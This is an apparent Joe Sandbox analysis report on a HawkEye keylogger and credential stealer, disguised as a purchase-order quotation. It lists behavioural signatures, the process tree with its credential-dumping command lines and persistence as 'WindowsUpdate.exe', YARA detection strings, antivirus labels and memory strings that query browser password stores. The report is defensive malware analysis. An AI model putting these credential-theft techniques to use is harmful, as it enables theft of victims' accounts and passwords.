Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO 2010029_pdf Quotation from Alibaba Ale.exe

Overview

General Information

Sample Name:PO 2010029_pdf Quotation from Alibaba Ale.exe
Analysis ID:341532
MD5:eb59d99961c7636b4872e389da03cbc9
SHA1:22d5fb0f076a0d945596b7938e72b6b5cae73674
SHA256:4dd89aea31cfb64c8fa6b542c9ad002e4041ef5249f2072947df749e00e7fd9e
Tags:exeYahoo

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO 2010029_pdf Quotation from Alibaba Ale.exe (PID: 2148 cmdline: 'C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe' MD5: EB59D99961C7636B4872E389DA03CBC9)
    • dw20.exe (PID: 4636 cmdline: dw20.exe -x -s 2216 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
    • vbc.exe (PID: 6084 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • vbc.exe (PID: 968 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • WerFault.exe (PID: 6004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • WindowsUpdate.exe (PID: 4848 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: EB59D99961C7636B4872E389DA03CBC9)
  • WindowsUpdate.exe (PID: 6328 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: EB59D99961C7636B4872E389DA03CBC9)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
  • 0x7b833:$key: HawkEyeKeylogger
  • 0x7dab7:$salt: 099u787978786
  • 0x7be96:$string1: HawkEye_Keylogger
  • 0x7cce9:$string1: HawkEye_Keylogger
  • 0x7da17:$string1: HawkEye_Keylogger
  • 0x7c27f:$string2: holdermail.txt
  • 0x7c29f:$string2: holdermail.txt
  • 0x7c1c1:$string3: wallet.dat
  • 0x7c1d9:$string3: wallet.dat
  • 0x7c1ef:$string3: wallet.dat
  • 0x7d5db:$string4: Keylog Records
  • 0x7d8f3:$string4: Keylog Records
  • 0x7db0f:$string5: do not script -->
  • 0x7b81b:$string6: \pidloc.txt
  • 0x7b8a9:$string7: BSPLIT
  • 0x7b8b9:$string7: BSPLIT
00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
        • 0x7beee:$hawkstr1: HawkEye Keylogger
        • 0x7cd2f:$hawkstr1: HawkEye Keylogger
        • 0x7d05e:$hawkstr1: HawkEye Keylogger
        • 0x7d1b9:$hawkstr1: HawkEye Keylogger
        • 0x7d31c:$hawkstr1: HawkEye Keylogger
        • 0x7d5b3:$hawkstr1: HawkEye Keylogger
        • 0x7ba7c:$hawkstr2: Dear HawkEye Customers!
        • 0x7d0b1:$hawkstr2: Dear HawkEye Customers!
        • 0x7d208:$hawkstr2: Dear HawkEye Customers!
        • 0x7d36f:$hawkstr2: Dear HawkEye Customers!
        • 0x7bb9d:$hawkstr3: HawkEye Logger Details:
        Click to see the 91 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.vbc.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.1.unpackMAL_RANSOM_COVID19_Apr20_1Detects ransomware distributed in COVID-19 themeFlorian Roth
          • 0x58eb7:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
          • 0x5883f:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34
          11.2.WindowsUpdate.exe.1c5f0000.3.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
          • 0x8908b:$key: HawkEyeKeylogger
          • 0x8b30f:$salt: 099u787978786
          • 0x896ee:$string1: HawkEye_Keylogger
          • 0x8a541:$string1: HawkEye_Keylogger
          • 0x8b26f:$string1: HawkEye_Keylogger
          • 0x89ad7:$string2: holdermail.txt
          • 0x89af7:$string2: holdermail.txt
          • 0x89a19:$string3: wallet.dat
          • 0x89a31:$string3: wallet.dat
          • 0x89a47:$string3: wallet.dat
          • 0x8ae33:$string4: Keylog Records
          • 0x8b14b:$string4: Keylog Records
          • 0x8b367:$string5: do not script -->
          • 0x89073:$string6: \pidloc.txt
          • 0x89101:$string7: BSPLIT
          • 0x89111:$string7: BSPLIT
          11.2.WindowsUpdate.exe.1c5f0000.3.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            11.2.WindowsUpdate.exe.1c5f0000.3.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
              Click to see the 110 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: vbc.exe.968.3.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeReversingLabs: Detection: 36%
              Multi AV Scanner detection for submitted fileShow sources
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeReversingLabs: Detection: 36%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeJoe Sandbox ML: detected
              Source: 11.2.WindowsUpdate.exe.1ee40000.4.unpackAvira: Label: TR/Inject.vcoldi
              Source: 8.2.WindowsUpdate.exe.1c5f0000.4.unpackAvira: Label: TR/Inject.vcoldi
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 8.2.WindowsUpdate.exe.1ad90000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 11.2.WindowsUpdate.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 11.2.WindowsUpdate.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 11.2.WindowsUpdate.exe.1c5f0000.3.unpackAvira: Label: TR/Inject.vcoldi
              Source: 8.2.WindowsUpdate.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 8.2.WindowsUpdate.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpackAvira: Label: TR/Inject.vcoldi
              Source: 0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpackAvira: Label: TR/Inject.vcoldi
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 11.2.WindowsUpdate.exe.1eed0000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
              Source: 8.2.WindowsUpdate.exe.1ee00000.5.unpackAvira: Label: TR/Inject.vcoldi

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Uses new MSVCR DllsShow sources
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
              Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: rsaenh.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: 1:pC:\Windows\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: wkernel32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcrypt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ws2_32.pdb0up source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ucrtbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Configuration.pdbKt0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemcomn.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: NapiNSP.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcrt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wrpcrt4.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wntdll.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb:p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: powrprof.pdbBuP source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoreei.pdbOs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winnsi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscms.pdbQn source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptsp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\mscorlib.pdbd source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wsspicli.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: CLBCatQ.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ntmarta.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc.pdbFp@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wwin32u.pdbup source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptsp.pdb`t0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wkernelbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: psapi.pdb7u` source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shlwapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: version.pdbht source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: WindowsUpdate.exe
              Source: Binary string: mscorjit.pdbbt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ODBC32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: WindowsUpdate.exe
              Source: Binary string: dwmapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoree.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Windows.Storage.pdbcw source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ws2_32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbDr source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msasn1.pdb8u source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: iphlpapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nsi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdb6 source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: rasman.pdb2o source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: powrprof.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Configuration.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ole32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: msasn1.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp, WERD288.tmp.mdmp.6.dr
              Source: Binary string: DWrite.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cfgmgr32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Drawing.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Management.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: combase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Windows.Storage.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc6.pdb]s0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: dpapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: apphelp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasadhlp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: dhcpcsvc.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dwmapi.pdbHt0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: pnrpnsp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptbase.pdbjt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: ColorAdapterClient.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wsspicli.pdbkt source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shcore.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fltLib.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shell32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcr80.i386.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msvcp_win.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dpapi.pdbxs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shfolder.pdbit`F source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dnsapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasapi32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Runtime.Remoting.pdb*p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: userenv.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wimm32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wwin32u.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nlaapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: userenv.pdbqs source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winnsi.pdbds source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winhttp.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wUxTheme.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: DDsymbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: wmiutils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: gdiplus.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorlib.pdbH source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: rtutils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorwks.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: profapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: dhcpcsvc6.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Kernel.Appcore.pdbGu source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wgdi32full.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorjit.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: sechost.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winhttp.pdb p source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoree.pdbWsP source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: shfolder.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wgdi32full.pdbmt@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rasman.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fastprox.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemsvc.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: winrnr.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Drawing.pdb@ source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: msctf.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: WindowsUpdate.exe
              Source: Binary string: System.Runtime.Remoting.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wmswsock.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: version.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: rsaenh.pdb]t source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.Xml.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: System.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscms.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscorrc.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.304520747.000000001B140000.00000002.00000001.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: Kernel.Appcore.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: WMINet_Utils.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: psapi.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: fwpuclnt.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcrypt.pdb[t source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: cryptbase.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wuser32.pdb@w source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: bcryptprimitives.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: mscoreei.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: nlaapi.pdb5o0 source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.321080904.0000000021E7A000.00000004.00000010.sdmp
              Source: Binary string: msvcp_win.pdb[w source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: oleaut32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wuser32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: wbemprox.pdb source: WERD288.tmp.mdmp.6.dr
              Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.312366191.000000001C847000.00000004.00000040.sdmp
              Source: Binary string: crypt32.pdb source: WERD288.tmp.mdmp.6.dr
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeBinary or memory string: autorun.inf
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exeBinary or memory string: [autorun]
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmpBinary or memory string: [autorun]
              Source: WindowsUpdate.exeBinary or memory string: autorun.inf
              Source: WindowsUpdate.exeBinary or memory string: [autorun]
              Source: WindowsUpdate.exeBinary or memory string: autorun.inf
              Source: WindowsUpdate.exeBinary or memory string: [autorun]
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00404A29 FindFirstFileExW,0_2_00404A29
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B018BD FindFirstFileExA,0_2_00B018BD
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B01BA6 FindFirstFileExW,FindClose,FindNextFileW,0_2_00B01BA6
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,2_2_00406EC3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,3_2_00408441
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 3_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,3_2_00407E0E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00404A29 FindFirstFileExW,8_2_00404A29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F018BD FindFirstFileExA,8_2_00F018BD
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW,8_2_00F01BA6
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F01D5C FindFirstFileExW,8_2_00F01D5C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 8_2_00F01D31 FindFirstFileExA,8_2_00F01D31
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F018BD FindFirstFileExA,11_2_00F018BD
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01BA6 FindFirstFileExW,FindClose,FindNextFileW,11_2_00F01BA6
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01D5C FindFirstFileExW,11_2_00F01D5C
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 11_2_00F01D31 FindFirstFileExA,11_2_00F01D31
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]8_2_1AE40728
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]11_2_1C940728

              Networking:

              barindex
              May check the online IP address of the machineShow sources
              Source: unknownDNS query: name: whatismyipaddress.com
              Source: unknownDNS query: name: whatismyipaddress.com
              Source: unknownDNS query: name: whatismyipaddress.com
              Source: unknownDNS query: name: whatismyipaddress.com
              Source: unknownDNS query: name: whatismyipaddress.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.16.155.36 104.16.155.36
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
